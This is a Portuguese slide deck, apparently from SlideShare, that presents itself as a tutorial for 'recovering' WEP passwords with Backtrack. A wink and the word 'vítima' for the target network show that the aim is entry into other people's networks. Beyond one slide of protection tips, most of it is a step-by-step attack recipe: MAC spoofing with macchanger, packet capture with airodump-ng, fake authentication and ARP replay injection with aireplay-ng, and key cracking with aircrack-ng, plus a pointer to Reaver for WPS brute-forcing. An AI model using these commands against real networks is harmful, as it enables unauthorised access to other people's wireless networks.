Como recuperar senhas WEP de redes wireless com Backtrack

895 visualizações

Publicada em

Tutorial sobre como recuperar senhas wep e dicas de como se proteger de ataques para ingresso não autorizado em redes wireles

Publicada em: Tecnologia
0 comentários
1 gostou
Estatísticas
Notas
  • Seja o primeiro a comentar

Sem downloads
Visualizações
Visualizações totais
895
No SlideShare
0
A partir de incorporações
0
Número de incorporações
1
Ações
Compartilhamentos
0
Downloads
27
Comentários
0
Gostaram
1
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Como recuperar senhas WEP de redes wireless com Backtrack

  1. 1. Como recuperar senha WEP de redes wireless com Backtrack Sim. Recuperar.
  2. 2. Do que você vai precisar? • Um adaptador wireless compatível • Um CD/DVD com Backtrack • Uma rede WEP próxima • Paciência com os comandos (MUITA)
  3. 3. Quanto tempo leva? • Depende do hardware e da conexão • 5 – 20 min (não calculando o tempo que se leva digitando comandos)
  4. 4. Funciona com redes WPA? • Este método não funciona • Use Reaver, também no Backtrack • Se você tiver sorte leva 2,5h • Documentação oficial sugere de 4 a 10 horas • Depende do hardware e da conexão também • Depende do tamanho da chave de criptografia, pois é força-bruta • O Access Point/Hot spot deve ter WPS (Wi-Fi Protected Setup)
  5. 5. Como se proteger? • Não use WEP, apenas WPA • Se houver WPS, desabilite-o • Não compre router com WPS
  6. 6. Passo 1 – Identificar interface • Abra o console > airmon-ng • Resultado = (interface) utilizada para o ataque (ex. ra0, wlan0)
  7. 7. Passo 2 – Falsificar o MAC > airmon-ng stop (interface) // prepara parada da interface > ifconfig (interface) down // desativa o dispositivo de rede > macchanger --mac 00:11:22:33:44:55 (interface) // muda o MAC > airmon-ng start (interface) // reativa interface • Se tudo ocorreu bem, você falsificou seu MAC!
  8. 8. Passo 3 – Identificar a vítima > airodump-ng (interface) • Mostrará uma lista de todas as redes no alcance • Copie o Nome da rede (name), BSSID e CH (channel)
  9. 9. Passo 4 – Sniffar tudo > airodump-np –c (channel) –w (name) --bssid (bssid) (interface) • Isso vai pegar todos os pacotes e colocar tudo em um arquivo chamado (name)
  10. 10. Passo 5 – Entrar na rede • Abra um novo console (deixe o outro aberto sniffando) > aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (name) (interface) • No final deve aparecer “Association Successful : )” • Entramos na rede! Mas não acabou...
  11. 11. Passo 6 – Entrar na rede • Precisamos sniffar uma quantidade maior de pacotes para o programa conseguir a senha da rede definitivamente > aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) • Criamos uma rota de tráfego para a captura ser mais rápida • Observe a coluna #Data incrementar mais rápido, precisamos que passe de 10.000 pacotes!
  12. 12. Passo 7 – Hora da verdade • Abre um terceiro console > aircrack-ng -b (bssid) (name-01.cap) • Se não houver pacotes suficientes vai abortar • Se estiver tudo certo vai aparecer “KEY FOUND” seguido da senha WEP da rede em questão

×